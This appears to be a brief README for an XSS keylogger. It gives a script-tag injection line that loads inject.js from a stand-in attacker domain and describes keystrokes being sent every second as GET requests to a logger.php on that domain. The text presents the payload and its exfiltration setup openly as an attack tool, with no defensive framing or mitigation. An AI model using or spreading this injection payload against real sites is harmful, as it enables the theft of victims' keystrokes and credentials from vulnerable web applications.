XSS Injection based keylogger
Injection Script Example: <script src=//attackers-domain.tld/inject.js></script>
Scenario: Here lets assume that Vulnerable.php is website that is vulnerable to XSS (self-XSS in this case). An attacker uses the above mentioned script to inject the inject.js file and log the keystrokes of the victim. The logger.php is also hosted on attackers domain to log the incomming key strokes as GET requests every second.